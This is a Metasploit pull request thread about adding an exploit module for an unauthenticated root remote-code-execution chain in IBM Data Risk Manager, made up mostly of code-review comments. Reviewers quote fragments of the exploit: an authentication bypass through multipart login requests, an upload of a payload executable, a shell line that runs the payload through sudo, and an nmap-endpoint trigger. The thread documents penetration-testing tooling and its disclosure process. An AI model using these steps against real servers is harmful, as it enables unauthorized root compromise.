Add exploit for IBM DRM RCE
rapid7/metasploit-framework pull request #13300
Opened 2020-04-21 08:51 UTC by pedrib

This PR adds an exploit for an unauthenticated remote code execution as root in IBM Data Risk Manager. This is a 0day at the time of this PR, check: 
https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md

2020-04-21 10:12 UTC, pedrib commented
I am waiting on the CVE IDs, but please go ahead with the review while we wait.

2020-04-21 16:59 UTC, gwillcox-r7 commented
Added `needs-testing` label as from looks of things, only those with an active service contract can download the IBM DRM software.

2020-04-21 17:05 UTC, pedrib commented
@gwillcox-r7 I can send pcaps if needed, same for PR #13301

2020-04-21 17:36 UTC, gwillcox-r7 commented
> @gwillcox-r7 I can send pcaps if needed, same for PR #13301

If you can for both this PR and for #130001 to msfdev@metasploit.com this would greatly assist our team in helping to confirm info.

2020-04-21 21:28 UTC, gwillcox-r7 commented
@pedrib If you could also send a demo of both of the modules to the same email address this would also be helpful.

2020-04-22 08:33 UTC, pedrib commented
@gwillcox-r7 a demo? Like an asciinema cast?

2020-04-23 14:07 UTC, acammack-r7 reviewed
Thanks for bringing us to the 0-day party! Detection seems a bit wobbly, though, and I think we would want to properly parse the JSON responses instead of just using regexes. I think there are also some code styling things that `rubocop -a` can help fix.

2020-04-23 14:07 UTC, acammack-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    if res and res.code == 302
A number of servers will `302` (generally to a `404` page) on unknown URIs. Is there anything about the redirect path that could help determine what this server is? Or perhaps another page that gives some hints?

2020-04-24 03:21 UTC, pedrib commented
@acammack-r7 all done, and thanks for showing me rubocop, will use it from now on on all my submissions.

I'm still waiting for those CVE, do you mind waiting or want to merge these PR now?

2020-04-28 06:56 UTC, wvu-r7 commented
Are you still waiting for CVEs?

2020-04-28 07:00 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +# This module requires Metasploit: http://metasploit.com/download
While we're waiting for CVEs, can you change this URL to `https://`? Same for #13301. Travis is yelling at us for that, plus the `TODO` CVEs.

2020-04-28 07:14 UTC, pedrib commented
@wvu-r7 all done. Yes I am still waiting, there's emails back and forth between myself and MITRE. Seems like IBM are the ones that have to issue CVE for their own product, and they are making me wait... I wonder why

2020-04-30 04:17 UTC, pedrib commented
Guys, I have removed all CVE and other TODO-links from these modules to get them ready for merging.
I will add all the info later (CVE, more advisory / vendor links, confirm affected versions). IBM is not responding to me at the moment, so once they do I'll send another PR.

I have sent pcaps to your email address.
This comment also applies to PR #13301  and #13304 .

2020-05-01 03:19 UTC, pedrib commented
@wvu-r7 finally we have CVE! Added them to this module and PR #13301 + PR #13304

2020-05-04 23:31 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +                if res && (res.code == 200)
I'm going to take a stab at unnesting these conditionals. Please use early `return` next time, as it's a preferred approach to avoid deep nesting of conditionals. Very hard to follow, man. :/

2020-05-04 23:32 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +                if res && (res.code == 200)
I'm going to take a stab at unnesting these conditionals. Please use early `return` next time, as it's a preferred approach to avoid deep nesting of conditionals. Very hard to follow, man. :/

2020-05-04 23:33 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    end
I'm going to take a stab at unnesting these conditionals. Please use early `return` next time, as it's a preferred approach to avoid deep nesting of conditionals. Very hard to follow, man. :/

2020-05-04 23:35 UTC, adfoster-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    end
Context: https://wiki.c2.com/?GuardClause

2020-05-04 23:55 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    end
This is also the longest `exploit` method I've ever read! Please break up code into more manageable methods next time. Thank you. :)

2020-05-05 03:46 UTC, wvu requested changes
Reviewed module doc.

2020-05-05 03:46 UTC, wvu-r7 commented on documentation/modules/exploit/linux/http/ibm_drm_rce.md
> +Module defaults work very well, you should just need to set RHOSTS and LHOST.
```suggestion
## Vulnerable Application

IBM Data Risk Manager (IDRM) contains three vulnerabilities that can be chained by an unauthenticated attacker to achieve remote code execution as root.
The first is an unauthenticated bypass, followed by a command injection as the server user, and finally abuse of an insecure default password.
This module exploits all three vulnerabilities, giving the attacker a root shell.
At the time of disclosure, this is a 0day. Versions 2.0.3 and below are confirmed to be affected, and the latest 2.0.6 is most likely affected too.

### Setup

The application is available to download as a Linux virtual appliance from IBM's website. You need to have a valid IBM contract to be able to do so.

## Verification Steps

Module defaults work very well, you should just need to set `RHOSTS` and `LHOST`.
```

2020-05-05 03:46 UTC, wvu-r7 commented on documentation/modules/exploit/linux/http/ibm_drm_rce.md
> +A successful exploit will look like this:
```suggestion

## Scenarios

A successful exploit will look like this:

```

2020-05-05 03:46 UTC, wvu-r7 commented on documentation/modules/exploit/linux/http/ibm_drm_rce.md
> +
Move this under the `Vulnerable Application` H2 and make it an H3 or drop the header.

```suggestion
### Vulnerability Information

For more information about the vulnerability, check the advisory at:
https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm\_drm/ibm\_drm\_rce.md
```

Something like this.

2020-05-05 04:00 UTC, pedrib commented on documentation/modules/exploit/linux/http/ibm_drm_rce.md
> +
Done

2020-05-05 04:12 UTC, wvu submitted a review, later dismissed
Code reviewed. If I missed anything, apply comments everywhere they apply.

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    post_data.add_part(session_id, nil, nil, content_disposition = 'form-data; name="sessionId"')
```suggestion
    post_data.add_part('', nil, nil, 'form-data; name="deviceid"')
    post_data.add_part(rand_text_alpha(8..15), nil, nil, 'form-data; name="password"')
    post_data.add_part('admin', nil, nil, 'form-data; name="username"')
    post_data.add_part('', nil, nil, 'form-data; name="clientDetails"')
    post_data.add_part(session_id, nil, nil, 'form-data; name="sessionId"')
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'user', 'login'),
```suggestion
      'uri' => normalize_uri(target_uri.path, 'albatross', 'user', 'login'),
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    unless res && (res.code == 200) && res.body[/\"data\":\"([0-9a-f\-]{36})/]
Still don't need to escape non-metachars in regex. So `"` is fine.

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'login'),
```suggestion
      'uri' => normalize_uri(target_uri.path, 'albatross', 'login'),
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    unless res && (res.code == 200) && res.body =~ /var csrfToken \= \"([0-9a-f\-]{36})\";/
Don't need to escape these chars.

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    payload_file = rand_text_alpha(5..12) + '.enc'
You can use interpolation in the future to avoid `nil` issues.

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    post_data.add_part(generate_payload_exe, 'application/octet-stream', 'binary', content_disposition = "form-data; name=\"patchFiles\"; filename=\"#{payload_file}\"")
```suggestion
    post_data.add_part(generate_payload_exe, 'application/octet-stream', 'binary', "form-data; name=\"patchFiles\"; filename=\"#{payload_file}\"")
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    post_data.add_part(script_file_contents, 'application/octet-stream', 'binary', content_disposition = "form-data; name=\"patchFiles\"; filename=\"#{script_file}\"")
```suggestion
    post_data.add_part(script_file_contents, 'application/octet-stream', 'binary', "form-data; name=\"patchFiles\"; filename=\"#{script_file}\"")
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    post_data.add_part('', nil, nil, content_disposition = 'form-data; name="clientDetails"')
```suggestion
    post_data.add_part('', nil, nil, 'form-data; name="deviceid"')
    post_data.add_part(password, nil, nil, 'form-data; name="password"')
    post_data.add_part('admin', nil, nil, 'form-data; name="username"')
    post_data.add_part('', nil, nil, 'form-data; name="clientDetails"')
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    post_data.add_part(script, nil, nil, content_disposition = 'form-data; name="ipAddress"')
```suggestion
    post_data.add_part('', nil, nil, 'form-data; name="clientDetails"')
    post_data.add_part('1', nil, nil, 'form-data; name="type"')
    post_data.add_part('', nil, nil, 'form-data; name="portRange"')
    post_data.add_part(script, nil, nil, 'form-data; name="ipAddress"')
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'upload', 'patch'),
```suggestion
      'uri' => normalize_uri(target_uri.path, 'albatross', 'upload', 'patch'),
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    cmd += " else #{@payload_filepath}; fi; rm /tmp/#{rand_file}"
```suggestion
    cmd << " root=`cat /tmp/#{rand_file}`;"
    cmd << " if [ $root == 'root' ]; then sudo #{@payload_filepath};"
    cmd << " else #{@payload_filepath}; fi; rm /tmp/#{rand_file}"
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'upload', 'patch'),
```suggestion
      'uri' => normalize_uri(target_uri.path, 'albatross', 'upload', 'patch'),
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'user', 'login'),
```suggestion
      'uri' => normalize_uri(target_uri.path, 'albatross', 'user', 'login'),
```

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    unless res && (res.code == 200) && res.body =~ /\"data\":\{\"access_token\":\"([0-9a-f\-]{36})\",\"token_type\":\"bearer\"/
Again, no need to escape. You do need to escape `{`, though.

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    password = free_the_admin(session_id)
FREE THE ADMIN.

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'restAPI', 'v2', 'nmap', 'run', 'scan', rand(99 + 1).to_s),
```suggestion
      'uri' => normalize_uri(target_uri.path, 'albatross', 'restAPI', 'v2', 'nmap', 'run', 'scan', rand(99 + 1).to_s),
```

You can also use a `..` range with `rand`.

2020-05-05 04:12 UTC, wvu-r7 commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    end
```suggestion
    unless res && (res.code == 200)
      fail_with(Failure::Unknown, "#{peer} - Failed to run nmap scan.")
    end
    
    print_good("#{peer} - Shell incoming!")
```

2020-05-05 06:21 UTC, pedrib commented on modules/exploits/linux/http/ibm_drm_rce.rb
> +    password = free_the_admin(session_id)
He's free now. The 0day saved him

2020-05-05 06:21 UTC, pedrib commented
ok all done!

2020-05-05 15:49 UTC, wvu-r7 commented
Rebased!

2020-05-05 16:32 UTC, wvu-r7 commented
# Release Notes

This adds a remote root exploit for IBM Data Risk Manager versions 2.0.3 (possibly 2.0.6) and below, covering CVE-2020-4427, CVE-2020-4428, and CVE-2020-4429.

2020-05-05 17:08 UTC, merged